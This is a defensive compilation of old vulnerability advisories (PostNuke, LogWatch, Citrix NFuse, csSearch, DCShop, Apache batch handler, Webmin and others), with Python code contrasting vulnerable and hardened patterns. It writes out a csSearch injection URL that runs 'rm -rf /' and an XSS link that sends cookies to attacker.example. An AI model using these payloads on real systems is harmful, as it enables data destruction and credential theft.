PostNuke Arbitrary Module Inclusion Vulnerability

A vulnerability has been reported in some versions of PostNuke. Reportedly, the script user.php can be forced to include an arbitrary module named by the request. Because the included file may be hosted on a remote server, an attacker can supply one containing arbitrary PHP code, which is then executed on the vulnerable system with the privileges of the web server process.
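The following is an added example, not PostNuke code: a Python stand-in for an include() that trusts the request, beside the hardened resolver that an application should use instead. The modules directory, the allowlist of module names and the ".php" suffix are assumptions chosen for illustration.

```python
import re
from pathlib import Path

# Constructed stand-in for the modules directory and the set of modules the
# site actually ships; neither name is taken from PostNuke itself.
MODULES_DIR = Path("/var/www/postnuke/modules")
KNOWN_MODULES = {"News", "Search", "Members_List"}
MODULE_NAME = re.compile(r"[A-Za-z0-9_]+")
URL_SCHEME = re.compile(r"^[a-z][a-z0-9+.-]*://", re.I)


def vulnerable_module_path(module):
    """Mirrors include($module . '.php') with no validation: whatever the
    request supplies is handed to the loader, so a URL becomes a remote
    include and '../' walks out of the modules tree."""
    return module + ".php"


def looks_remote(module):
    """True if the value would be fetched over the network by an include()
    that has URL wrappers enabled."""
    return URL_SCHEME.match(module) is not None


def safe_module_path(module):
    """Hardened form: the name must be a bare identifier, it must be on the
    allowlist, and the resolved file must still sit under MODULES_DIR."""
    if not MODULE_NAME.fullmatch(module):
        raise ValueError(f"rejected module name: {module!r}")
    if module not in KNOWN_MODULES:
        raise ValueError(f"unknown module: {module!r}")
    path = MODULES_DIR / f"{module}.php"
    # Defence in depth: cannot fail after the checks above, but keeps the
    # confinement explicit if the name rules are ever relaxed.
    if MODULES_DIR not in path.parents:
        raise ValueError("module path escapes the modules directory")
    return path
```

The allowlist is the real fix; the identifier regex and the parent-directory check only make the intent visible and survive later refactoring.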

LogWatch 2.1.1 root shell exploit

LogWatch is a freely available, open source script for monitoring log files on Linux and Unix systems. On execution, LogWatch creates a working directory in /tmp named logwatch.$pid, where $pid is the process ID of the running script. The script neither checks whether that directory already exists nor inspects its contents. Because process IDs are allocated sequentially and can be predicted, a local user can create logwatch.$pid directories in advance and place malicious files in them, which LogWatch will then execute when it runs; since LogWatch is normally run by root, this yields root privileges.
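An added example, not LogWatch's own code, that models the race in Python: the attacker pre-creates directories for a window of predicted PIDs in a stand-in for /tmp, the vulnerable creator silently reuses one of them, and two hardened creators (a random mkdtemp name, or a strict mkdir that refuses an existing directory) do not. The PID value and the planted payload are constructed for the demonstration.

```python
import os
import shutil
import stat
import tempfile


def vulnerable_workdir(tmp_root, pid):
    """Models LogWatch's behaviour: the name is derived from the PID and an
    existing directory, whoever created it, is silently reused."""
    path = os.path.join(tmp_root, f"logwatch.{pid}")
    os.makedirs(path, exist_ok=True)      # no error if someone got there first
    return path


def attacker_precreate(tmp_root, current_pid, window=50):
    """A local attacker pre-creates directories for the next `window` PIDs and
    drops a file where the script expects to find only its own output."""
    planted = []
    for pid in range(current_pid + 1, current_pid + 1 + window):
        path = os.path.join(tmp_root, f"logwatch.{pid}")
        os.makedirs(path, exist_ok=True)
        with open(os.path.join(path, "payload.sh"), "w") as f:
            f.write("#!/bin/sh\necho attacker-controlled\n")   # constructed payload
        planted.append(path)
    return planted


def safe_workdir(tmp_root):
    """Hardened form: unpredictable name, created atomically with mode 0700,
    so a pre-created directory can never be handed back to us."""
    return tempfile.mkdtemp(prefix="logwatch.", dir=tmp_root)


def strict_workdir(tmp_root, pid):
    """Alternative when the name must stay predictable: mkdir without
    exist_ok fails on a planted directory, and we verify what we got."""
    path = os.path.join(tmp_root, f"logwatch.{pid}")
    os.mkdir(path, 0o700)                 # raises FileExistsError if planted
    st = os.lstat(path)
    if (not stat.S_ISDIR(st.st_mode) or st.st_uid != os.getuid()
            or stat.S_IMODE(st.st_mode) != 0o700):
        raise RuntimeError("unsafe working directory")
    return path


def demo():
    root = tempfile.mkdtemp(prefix="fake-tmp.")   # stand-in for /tmp
    victim_pid = 4242                              # constructed "next" PID
    try:
        attacker_precreate(root, victim_pid - 1, window=5)
        reused = vulnerable_workdir(root, victim_pid)
        inherited = os.path.exists(os.path.join(reused, "payload.sh"))
        fresh = safe_workdir(root)
        clean = os.listdir(fresh) == []
        try:
            strict_workdir(root, victim_pid)
            refused = False
        except FileExistsError:
            refused = True
    finally:
        shutil.rmtree(root)
    return {"inherited_payload": inherited, "fresh_dir_clean": clean,
            "strict_refused": refused}
```

mkdtemp is the right default: a random name removes the prediction step entirely, whereas the strict variant still lets an attacker deny service by filling the predictable names.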

Citrix NFuse Cross-Site Scripting Vulnerability

Citrix NFuse is an application portal server that makes server-hosted applications available through a web browser. It runs in conjunction with a previously installed web server and is available for Unix and Linux variants as well as Microsoft Windows. A cross-site scripting vulnerability exists in Citrix NFuse: the launch.asp and launch.jsp scripts reflect URL parameters into the generated page without filtering or encoding script code. An attacker can craft a link to one of these scripts that carries script code; when a user follows the link, the code executes in that user's browser in the security context of the site running NFuse, which may allow the attacker to steal cookie-based authentication credentials of legitimate users.

csSearch Remote Code Execution Vulnerability

csSearch is a website search script written in Perl. It is prone to an issue that may allow an attacker to execute Perl code with the privileges of the web server process: properly URL-encoded Perl code passed in CGI parameters is executed by the script. For example, the classic 'rm -rf /' case would be csSearch.cgi?command=savesetup&setup=`rm%20-rf%20/`; the backticks are Perl's command-execution operator, so the enclosed string is handed to a shell and run as the web server user. The original exploit also includes under 300 bytes of code that turns csSearch into a remote web shell of sorts.

Linux kernel d_path proof-of-concept exploit

The Linux kernel function d_path() converts a dentry structure into an ASCII path name, building the full path into a fixed-length buffer of PAGE_SIZE bytes. Reportedly, if the path for the given dentry would exceed this length, an erroneous value is returned: the leading entries of the path are silently dropped, the remainder is returned as if it were the complete path, and no error is reported to the caller.
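An added example that models the reported behaviour in Python rather than reproducing the kernel's C. The buffer size is shrunk to 16 bytes so the effect is visible on short paths; the path components are constructed. It also shows why the silent truncation matters: two different dentries can come back with the same name, and the caller has no way to tell.

```python
PAGE_SIZE = 16   # deliberately tiny stand-in for the 4096-byte kernel buffer


class NameTooLong(Exception):
    """Raised by the checked variant when the full path does not fit."""


def d_path_prepend(components, bufsize=PAGE_SIZE):
    """Models the reported behaviour: names are prepended from the leaf
    towards the root into a fixed buffer (one byte reserved for the C NUL),
    and when the next '/name' no longer fits the loop simply stops. The
    caller gets a path with its leading entries missing and no error."""
    room = bufsize - 1
    out = ""
    for name in reversed(components):
        piece = "/" + name
        if len(out) + len(piece) > room:
            break                         # truncation point: silently give up
        out = piece + out
    return out or "/"


def d_path_checked(components, bufsize=PAGE_SIZE):
    """Hardened form: refuse to return a partial name at all."""
    full = "/" + "/".join(components) if components else "/"
    if len(full) > bufsize - 1:
        raise NameTooLong(f"{len(full)} bytes do not fit in {bufsize}")
    return full
```

Anything downstream that compares the returned string against a directory prefix is fed the truncated name with no signal that it is incomplete; the checked form turns that into an explicit error the caller must handle.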

DCShop Beta Overwrite Setup Files Vulnerability

DCShop Beta is a freely available shopping cart system written in Perl. It is possible to overwrite its setup files (*.setup) by submitting attacker-supplied form data terminated with a null character (%00): Perl passes the string through to the C library, which treats the null byte as the end of the file name, so any extension the script appends after the user-supplied value is discarded. The attacker must submit the data with the POST method as a multipart/form-data request.
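An added example, not DCShop's code, showing the null-byte truncation in Python: the script believes it only ever writes files ending in ".html" because it appends that extension itself, but the name that reaches open(2) stops at the NUL. The data directory, the field value and the ".html" suffix are assumptions for the demonstration.

```python
import re
from urllib.parse import unquote

SETUP_DIR = "/var/www/dcshop/data"     # constructed; the real layout is not assumed


def c_string_view(s):
    """What open(2) actually receives: Perl passes the bytes through, and the
    C library stops at the first NUL."""
    return s.split("\0", 1)[0]


def form_value(raw):
    """Decode the field as a URL-encoded form would; with multipart/form-data
    the NUL simply arrives as a raw byte, with the same effect."""
    return unquote(raw)


def vulnerable_target(field_value):
    """The script appends '.html' and assumes that is what gets written;
    the NUL makes the OS drop that suffix, so 'store.setup' is overwritten."""
    intended = f"{SETUP_DIR}/{field_value}.html"
    return c_string_view(intended)


def safe_target(field_value):
    """Hardened form: reject NUL outright and restrict the name to a safe
    character set before building the path."""
    if "\0" in field_value:
        raise ValueError("NUL byte in file name")
    if not re.fullmatch(r"[A-Za-z0-9_-]+", field_value):
        raise ValueError("disallowed characters in file name")
    return f"{SETUP_DIR}/{field_value}.html"
```

The character-set check matters as much as the NUL check: it also removes "/" and ".", which closes the directory traversal that usually accompanies this class of bug.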

Apache for Windows Batch File Handler Remote Command Execution Vulnerability

Special characters (such as |) may not be filtered by the batch file handler when a web request is made for a batch file, so shell metacharacters in the request are passed through to the command interpreter. As a result, a remote attacker may be able to execute arbitrary commands on the host running the vulnerable software. Web servers on Windows are normally run as a service with SYSTEM privileges, so such commands run with full control of the host. The 2.0.x series of Apache for Microsoft Windows ships with a test batch file that may be used to exploit this; since the issue lies in the batch file handler itself, any batch file reachable via the web is suitable for exploitation.
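The csSearch backtick injection above and this batch file handler issue are the same mechanism: untrusted input reaches a command interpreter that honours metacharacters. The following added example (not code from either product) shows it in Python, with POSIX sh standing in for both Perl's backtick shell and cmd.exe; the "|" pipe behaves the same way in each. The command being built and the request values are constructed for the demonstration.

```python
import re
import subprocess
from urllib.parse import unquote

# Shell metacharacters that should never reach a command interpreter unescaped.
METACHARS = re.compile(r"[|&;`$<>(){}\n\r]")


def vulnerable_run(user_arg):
    """Models a handler that builds one command string and hands it to the
    system shell, as Perl backticks or cmd.exe running a .bat do: a '|' in
    user_arg ends the intended command and starts the attacker's."""
    cmd = f"echo searching for {user_arg}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def safe_run(user_arg):
    """Hardened form: no shell at all; the value stays a single argv element
    and is printed back literally, pipe and all."""
    proc = subprocess.run(["echo", "searching for", user_arg],
                          capture_output=True, text=True)
    return proc.stdout


def flag_parameter(raw_value):
    """Detection side: URL-decode the CGI parameter as the server would and
    report whether it carries shell metacharacters."""
    decoded = unquote(raw_value)
    return METACHARS.search(decoded) is not None
```

Where a shell cannot be avoided, the value must be quoted for that specific interpreter (shlex.quote for POSIX sh); cmd.exe has no equivalent that is safe for every metacharacter, which is why the batch handler is hard to fix by filtering alone.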

PHP-Nuke Path Disclosure Vulnerability

A vulnerability has been reported in some versions of PHP-Nuke. Reportedly, a maliciously constructed HTTP request causes the index.php script to return an error message that includes the full filesystem path of the script, information that is useful for planning further attacks. It has been suggested that this is the result of an insecure server configuration, such as PHP being configured to display error messages to clients.

Webmin Script Injection Vulnerability

Webmin does not filter or HTML-encode script code in content it displays through its web interface, such as log files. A local attacker with write access to such a file can therefore cause arbitrary script code to execute in the browser of the Webmin user, who is typically root. An attacker who can contrive a way to inject script code into any other output the Webmin interface displays may exploit the issue in the same way. This may allow the attacker to steal the root user's cookie-based authentication credentials, ultimately giving the local attacker an escalation of privileges.
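The NFuse entry above (script code reflected from a URL parameter) and this Webmin entry (script code stored in a log file and rendered later) are both output-encoding failures, so one added example covers both. It is illustrative Python, not code from either product; the "app" parameter name, the launch URL and the log line are constructed, and the sshd-style line shows how an unauthenticated remote user can get attacker-chosen text into a log that root later views.

```python
import html
import re
from urllib.parse import parse_qs, urlsplit

SCRIPT_TAG = re.compile(r"<\s*script\b", re.I)


def vulnerable_page(app_name):
    """Reflects the URL parameter into the page verbatim (the NFuse pattern)."""
    return f"<p>Launching {app_name}</p>"


def safe_page(app_name):
    """Hardened form: encode for the HTML text context it lands in."""
    return f"<p>Launching {html.escape(app_name, quote=True)}</p>"


def vulnerable_log_view(lines):
    """Renders stored log lines straight into markup (the Webmin pattern)."""
    return "<pre>" + "\n".join(lines) + "</pre>"


def safe_log_view(lines):
    return "<pre>" + "\n".join(html.escape(line, quote=True) for line in lines) + "</pre>"


def contains_live_script(markup):
    """Cheap check used here to show the difference; real detection must
    consider every injection context, not just <script> tags."""
    return SCRIPT_TAG.search(markup) is not None


def app_param(url):
    """Pull the hypothetical 'app' parameter out of a crafted launch URL."""
    return parse_qs(urlsplit(url).query).get("app", [""])[0]


# Constructed attacker link: the payload ships the victim's cookie off-site.
CRAFTED_URL = ("https://portal.example/launch.asp?app=%3Cscript%3Edocument.location%3D"
               "%27http%3A%2F%2Fattacker.example%2F%3F%27%2Bdocument.cookie%3C%2Fscript%3E")

# Constructed log line: the "invalid user" name is chosen by whoever connects.
CONSTRUCTED_LOG = [
    "Jan  1 00:00:01 host sshd[123]: Failed password for invalid user "
    "<script>alert(document.cookie)</script> from 10.0.0.5 port 4444 ssh2",
]
```

html.escape with quote=True is correct only for text and quoted-attribute contexts; a value placed inside a script block, a URL or an unquoted attribute needs the encoding appropriate to that context instead.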

PHP move_uploaded_file Function Open_basedir Check Vulnerability

It has been reported that PHP's move_uploaded_file function lacks an open_basedir check. As a result, the function may be used to place uploaded files in directories outside those permitted by the open_basedir setting. The issue cannot be exploited to overwrite existing files; it only allows new files to be created outside the restricted path.
